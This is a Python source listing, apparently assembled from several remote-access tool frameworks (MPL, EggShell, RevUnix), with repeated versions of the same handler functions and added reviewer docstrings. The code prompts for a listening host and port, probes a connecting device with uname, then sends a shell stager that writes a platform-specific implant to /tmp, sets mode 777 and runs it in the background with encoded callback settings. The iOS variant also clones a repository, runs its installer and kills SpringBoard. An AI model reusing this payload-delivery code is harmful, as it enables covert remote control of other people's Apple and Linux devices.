def set_host_port(self):
    """Ask the operator for the local listening address and port.

    An empty answer to the host prompt keeps the value returned by
    ``h.getip()``; an empty answer to the port prompt selects 4444. A port is
    accepted once it parses as an integer and is at least 1024 (no upper
    bound is checked here). The host is resolved with
    ``socket.gethostbyname`` and stored on ``self.host``; the port is stored
    on ``self.port``.

    Returns:
        True once both values are stored, or None when a KeyboardInterrupt
        is raised while prompting.
    """
    try:
        default_host = h.getip()
        typed_host = raw_input(h.info_general_raw("Local Host: "))
        lhost = default_host if typed_host == "" else typed_host

        accepted_port = None
        while accepted_port is None:
            typed_port = raw_input(h.info_general_raw("Local Port: "))
            try:
                # Empty input falls back to the default port.
                candidate = int(typed_port) if typed_port else 4444
            except ValueError:
                h.info_error("Invalid port, please enter a valid integer.")
                continue
            if candidate < 1024:
                h.info_error("Invalid port, please enter a value >= 1024.")
                continue
            accepted_port = candidate

        h.info_general("Using " + lhost + ":" + str(accepted_port) + "...")
        # NOTE(review): a resolution failure raised by gethostbyname is not
        # handled in this block.
        self.host = socket.gethostbyname(lhost)
        self.port = accepted_port
        return True
    except KeyboardInterrupt:
        return None
def disconnect(self, verbose):
    """Close this session's connection and drop it from the multihandler.

    Args:
        verbose: When truthy, a "Closing session..." message is printed
            through ``h.info_general``.

    If ``self.server.multihandler.is_running`` is truthy, the entries keyed
    by ``self.id`` and ``self.uid`` are deleted from its ``sessions_id`` and
    ``sessions_uid`` mappings; a missing key is not handled here.
    """
    self.conn.close()
    if verbose:
        h.info_general("Closing session...")
    # NOTE(review): the collapsed listing does not show whether this pause
    # belongs to the verbose branch; it is kept unconditional here - confirm
    # against the upstream file.
    time.sleep(0.5)

    handler = self.server.multihandler
    if not handler.is_running:
        return
    del handler.sessions_id[self.id]
    del handler.sessions_uid[self.uid]
def craft_payload(self, device_arch):
    """Return the shell command string and binary blob for a platform.

    Args:
        device_arch: Platform string; compared against
            ``self.macos_architectures``, ``self.ios_architectures`` and the
            literal "Linux".

    Returns:
        A tuple ``(instructions, payload)``. ``instructions`` is a
        newline-terminated shell command string; ``payload`` is the raw
        content of the matching file under ``resources/``.

    Raises:
        ValueError: if ``self.host`` or ``self.port`` is falsy, or if
            ``device_arch`` contains "GET / HTTP/1.1".

    Defender note: each command string writes its standard input to a fixed
    path (/private/tmp/mpl, /.mpl or /tmp/mpl.py), sets mode 777 and starts
    the file in the background with one encoded argument. The iOS string
    additionally removes and re-clones a ``mouse`` directory, runs its
    install.sh and kills SpringBoard. These fixed paths and command
    sequences are stable on-host indicators.
    """
    # TODO: Detect uid before we send executable
    if not self.host:
        raise ValueError('Server host not set')
    if not self.port:
        raise ValueError('Server port not set')

    settings = {
        "ip": self.host,
        "port": self.port,
        "debug": self.debug
    }
    # h.b64 is a project helper (presumably base64 - not shown here).
    payload_parameter = h.b64(json.dumps(settings))

    def read_resource(path):
        # Read one bundled file as bytes.
        handle = open(path, "rb")
        content = handle.read()
        handle.close()
        return content

    if device_arch in self.macos_architectures:
        self.verbose_print("Detected macOS")
        payload = read_resource("resources/mplmacos")
        # Written under a temporary name first, then renamed.
        command_prefix = (
            "cat >/private/tmp/tmpmpl;"
            "chmod 777 /private/tmp/tmpmpl;"
            "mv /private/tmp/tmpmpl /private/tmp/mpl;"
            "/private/tmp/mpl "
        )
        instructions = command_prefix + payload_parameter + " 2>/dev/null &\n"
        return (instructions, payload)

    if device_arch in self.ios_architectures:
        self.verbose_print("Detected iOS")
        payload = read_resource("resources/mplios")
        command_prefix = (
            "cat >/tmp/tmpmpl;"
            "chmod 777 /tmp/tmpmpl;"
            "mv /tmp/tmpmpl /.mpl;"
            "rm -r mouse;"
            "git clone https://github.com/entynetproject/mouse.git;"
            "cd mouse/substrate && chmod +x install.sh && ./install.sh --ignore-package && killall SpringBoard;"
            "/.mpl "
        )
        instructions = command_prefix + payload_parameter + " 2>/dev/null &\n"
        return (instructions, payload)

    # Neither macOS nor iOS: fall back to the Python resource.
    if device_arch == "Linux":
        self.verbose_print("Detected Linux")
    elif "GET / HTTP/1.1" in device_arch:
        # The peer sent an HTTP request line instead of a platform string.
        raise ValueError(
            "MPL does not exploit safari, it is a payload loader.")
    else:
        h.info_general("Device unrecognized, trying python payload...")

    payload = read_resource("resources/mpl.py")
    # NOTE(review): the file is written to /tmp/mpl.py while chmod names
    # /var/tmp/mpl.py; reproduced exactly as in the original.
    command_prefix = (
        "cat >/tmp/mpl.py;"
        "chmod 777 /var/tmp/mpl.py;"
        "python /tmp/mpl.py "
    )
    instructions = command_prefix + payload_parameter + " &\n"
    return (instructions, payload)
def craft_payload(self, device_arch):
    """Return the shell command string and binary blob for a platform.

    Args:
        device_arch: Platform string; compared against
            ``self.macos_architectures``, ``self.ios_architectures`` and the
            literal "Linux".

    Returns:
        A tuple ``(instructions, payload)``. ``instructions`` is a
        newline-terminated shell command string; ``payload`` is the raw
        content of the matching file under ``resources/``.

    Raises:
        ValueError: if ``self.host`` or ``self.port`` is falsy, or if
            ``device_arch`` contains "GET / HTTP/1.1".

    Defender note: each command string writes its standard input to a fixed
    path (/private/tmp/espl, /.espl or /tmp/espl.py), sets mode 777 and
    starts the file in the background with one encoded argument. These
    fixed paths and command sequences are stable on-host indicators.
    """
    # TODO: Detect uid before we send executable
    if not self.host:
        raise ValueError('Server host not set')
    if not self.port:
        raise ValueError('Server port not set')

    settings = {
        "ip": self.host,
        "port": self.port,
        "debug": self.debug
    }
    # h.b64 is a project helper (presumably base64 - not shown here).
    payload_parameter = h.b64(json.dumps(settings))

    def read_resource(path):
        # Read one bundled file as bytes.
        handle = open(path, "rb")
        content = handle.read()
        handle.close()
        return content

    if device_arch in self.macos_architectures:
        self.verbose_print("Detected macOS")
        payload = read_resource("resources/esplmacos")
        # Written under a temporary name first, then renamed.
        command_prefix = (
            "cat >/private/tmp/tmpespl;"
            "chmod 777 /private/tmp/tmpespl;"
            "mv /private/tmp/tmpespl /private/tmp/espl;"
            "/private/tmp/espl "
        )
        instructions = command_prefix + payload_parameter + " 2>/dev/null &\n"
        return (instructions, payload)

    if device_arch in self.ios_architectures:
        self.verbose_print("Detected iOS")
        payload = read_resource("resources/esplios")
        command_prefix = (
            "cat >/tmp/tmpespl;"
            "chmod 777 /tmp/tmpespl;"
            "mv /tmp/tmpespl /.espl;"
            "/.espl "
        )
        instructions = command_prefix + payload_parameter + " 2>/dev/null &\n"
        return (instructions, payload)

    # Neither macOS nor iOS: fall back to the Python resource.
    if device_arch == "Linux":
        self.verbose_print("Detected Linux")
    elif "GET / HTTP/1.1" in device_arch:
        # The peer sent an HTTP request line instead of a platform string.
        raise ValueError(
            "EggShell does not exploit safari, it is a payload creation tool.\nPlease look at the README.md file"
        )
    else:
        h.info_general("Device unrecognized, trying python payload")

    payload = read_resource("resources/espl.py")
    # NOTE(review): the file is written to /tmp/espl.py while chmod names
    # /var/tmp/espl.py; reproduced exactly as in the original.
    command_prefix = (
        "cat >/tmp/espl.py;"
        "chmod 777 /var/tmp/espl.py;"
        "python /tmp/espl.py "
    )
    instructions = command_prefix + payload_parameter + " &\n"
    return (instructions, payload)
def set_host_port(self):
    """Ask the operator for LHOST and LPORT and store them on the instance.

    The host prompt shows the value of ``h.getip()`` and keeps it when the
    answer is empty. The port prompt repeats until the answer parses as an
    integer that is at least 1024; an empty answer selects 4444. No upper
    bound is checked here. ``self.host`` receives the result of
    ``socket.gethostbyname`` on the chosen host, ``self.port`` the port.

    Returns:
        True once both values are stored, or None when a KeyboardInterrupt
        is raised while prompting.
    """
    try:
        lhost = h.getip()
        host_prompt = h.info_general_raw(
            "SET LHOST (Leave blank for " + lhost + ")>")
        answer = raw_input(host_prompt)
        if answer != "":
            lhost = answer
        h.info_general("LHOST = " + lhost)

        port_value = None
        while port_value is None:
            port_text = raw_input(
                h.info_general_raw("SET LPORT (Leave blank for 4444)>"))
            try:
                # Empty input falls back to the default port.
                parsed = int(port_text) if port_text else 4444
            except ValueError:
                h.info_general(
                    "invalid port, please enter a valid integer")
                continue
            if parsed >= 1024:
                port_value = parsed
            else:
                h.info_general(
                    "invalid port, please enter a value >= 1024")

        h.info_general("LPORT = " + str(port_value))
        # NOTE(review): a resolution failure raised by gethostbyname is not
        # handled in this block.
        self.host = socket.gethostbyname(lhost)
        self.port = port_value
        return True
    except KeyboardInterrupt:
        return None
def set_host_port(self):
    """Ask the operator for the listening host and port and store them.

    The host prompt shows the value of ``h.getip()`` and keeps it when the
    answer is empty. The port prompt repeats until the answer parses as an
    integer that is at least 1024; an empty answer selects 1337. No upper
    bound is checked here. ``self.host`` receives the result of
    ``socket.gethostbyname`` on the chosen host, ``self.port`` the port.

    Returns:
        True once both values are stored, or None when a KeyboardInterrupt
        is raised while prompting.
    """
    try:
        lhost = h.getip()
        host_prompt = h.info_general_raw(
            "Set Listening Host (Leave blank for " + lhost + ")>")
        answer = raw_input(host_prompt)
        if answer != "":
            lhost = answer
        h.info_general("LHOST = " + lhost)

        port_value = None
        while port_value is None:
            port_text = raw_input(
                h.info_general_raw(
                    "Set Listening Port (Leave blank for 1337)>"))
            try:
                # Empty input falls back to the default port.
                parsed = int(port_text) if port_text else 1337
            except ValueError:
                h.info_general(
                    "Invalid Port. Please Enter A Valid Integer Value.")
                continue
            if parsed >= 1024:
                port_value = parsed
            else:
                h.info_general(
                    "Invalid Port. Please Enter A Port With Value >= 1024")

        h.info_general("LPORT = " + str(port_value))
        # NOTE(review): a resolution failure raised by gethostbyname is not
        # handled in this block.
        self.host = socket.gethostbyname(lhost)
        self.port = port_value
        return True
    except KeyboardInterrupt:
        return None
def craft_payload(self, device_arch):
    """Return the shell command string and binary blob for a platform.

    Args:
        device_arch: Platform string; compared against
            ``self.macos_architectures``, ``self.ios_architectures`` and the
            literal "Linux".

    Returns:
        A tuple ``(instructions, payload)``. ``instructions`` is a
        newline-terminated shell command string; ``payload`` is the raw
        content of the matching file under ``resources/``.

    Raises:
        ValueError: if ``self.host`` or ``self.port`` is falsy, or, when
            ``self.is_multi == False``, if ``device_arch`` contains
            "GET / HTTP/1.1".

    Status messages are printed only when ``self.is_multi == False``. The
    encoded argument always carries ``"debug": 1``.

    Defender note: each command string writes its standard input to a fixed
    path (/private/tmp/rupl, /tmp/rupl or /tmp/rupl.py), sets mode 777 and
    starts the file in the background with one encoded argument. These
    fixed paths and command sequences are stable on-host indicators.
    """
    if not self.host:
        raise ValueError(
            'Server Host IP Not Set. Please Set A Valid Host IP.')
    if not self.port:
        raise ValueError(
            'Server Port Number Not Set. Please Set A Valid Port Number.')

    settings = {
        "ip": self.host,
        "port": self.port,
        "debug": 1
    }
    # h.b64 is a project helper (presumably base64 - not shown here).
    payload_parameter = h.b64(json.dumps(settings))

    def read_resource(path):
        # Read one bundled file as bytes.
        handle = open(path, "rb")
        content = handle.read()
        handle.close()
        return content

    if device_arch in self.macos_architectures:
        if self.is_multi == False:
            h.info_general("Detected MacOS!")
        payload = read_resource("resources/ruplmacos")
        command_prefix = (
            "cat >/private/tmp/tmprupl;"
            "chmod 777 /private/tmp/tmprupl;"
            "mv /private/tmp/tmprupl /private/tmp/rupl;"
            "/private/tmp/rupl "
        )
        instructions = command_prefix + payload_parameter + " 2>/dev/null &\n"
        return (instructions, payload)

    if device_arch in self.ios_architectures:
        if self.is_multi == False:
            h.info_general("Detected iOS!")
        payload = read_resource("resources/ruplios")
        command_prefix = (
            "cat >/tmp/tmprupl;"
            "chmod 777 /tmp/tmprupl;"
            "mv /tmp/tmprupl /tmp/rupl;"
            "/tmp/rupl "
        )
        instructions = command_prefix + payload_parameter + " 2>/dev/null &\n"
        return (instructions, payload)

    # Neither macOS nor iOS: fall back to the Python resource. The platform
    # checks below, including the HTTP request-line rejection, run only
    # outside multi mode.
    if self.is_multi == False:
        if device_arch == "Linux":
            h.info_general("Detected Linux")
        elif "GET / HTTP/1.1" in device_arch:
            raise ValueError(
                "RevUnix does not exploit Safari Browser. RevUnix is a payload creation tool.\n Please look at the README.md file"
            )
        else:
            h.info_general(
                "Device Unrecognized... \nTrying Python Payload...")

    payload = read_resource("resources/rupl.py")
    # NOTE(review): the file is written to /tmp/rupl.py while chmod names
    # /var/tmp/rupl.py; reproduced exactly as in the original.
    command_prefix = (
        "cat >/tmp/rupl.py;"
        "chmod 777 /var/tmp/rupl.py;"
        "python /tmp/rupl.py "
    )
    instructions = command_prefix + payload_parameter + " &\n"
    return (instructions, payload)
def listen_for_stager(self):
    """Accept one inbound connection and answer it with the crafted payload.

    Steps, in order: bind a TCP socket to every interface ('0.0.0.0') on
    ``self.port`` with SO_REUSEADDR set, accept a single peer, send it a
    shell one-liner that reports ``uname -p`` (or ``uname``), read up to 128
    bytes as the platform string, call ``self.craft_payload`` with it, send
    both returned parts, close the peer socket and hand the listening socket
    to ``self.listen_for_executable_payload``.

    Returns:
        Whatever ``listen_for_executable_payload`` returns, or None when
        accept is interrupted, the peer sends nothing, payload crafting
        fails, or the final step raises.

    Status messages are printed only when ``self.is_multi == False``.

    Defender note: the listener serves the first peer that connects on any
    interface; nothing in this block checks who that peer is, and the
    identification command is sent in clear text.
    """
    identification_shell_command = 'com=$(uname -p); if [ $com != "unknown" ]; then echo $com; else uname; fi\n'

    listener = socket.socket()
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(('0.0.0.0', self.port))
    listener.listen(1)
    if self.is_multi == False:
        h.info_general("Listening On Port --> " + str(self.port) + ".....")

    try:
        peer, peer_addr = listener.accept()
    except KeyboardInterrupt:
        listener.close()
        return None

    peer_ip = peer_addr[0]
    if self.is_multi == False:
        h.info_general("Establishing Connection To " + peer_ip)

    peer.send(identification_shell_command)
    device_arch = peer.recv(128).strip()
    if not device_arch:
        # NOTE(review): both sockets are left open on this path.
        return None

    try:
        bash_stager, executable = self.craft_payload(device_arch)
    except Exception as err:
        h.info_error(str(err))
        raw_input("Please Press Enter To Continue Further!")
        # NOTE(review): both sockets are left open on this path as well.
        return None

    if self.is_multi == False:
        h.info_general("Sending Payload...")
    peer.send(bash_stager)
    peer.send(executable)
    peer.close()

    if self.is_multi == False:
        h.info_general("Establishing Secure Connection...")
    try:
        return self.listen_for_executable_payload(listener)
    except ssl.SSLError as err:
        h.info_error("SSL error: " + str(err))
    except Exception as err:
        h.info_error("Error: " + str(err))
    return None
def verbose_print(self, text):
    """Print ``text`` through ``h.info_general`` unless in multi mode.

    The message is printed only when ``self.is_multi`` compares equal to
    False; any other value (including None) suppresses it.
    """
    # Kept as an equality test against False rather than a truthiness test
    # so that values such as None still suppress the output.
    if self.is_multi != False:
        return
    h.info_general(text)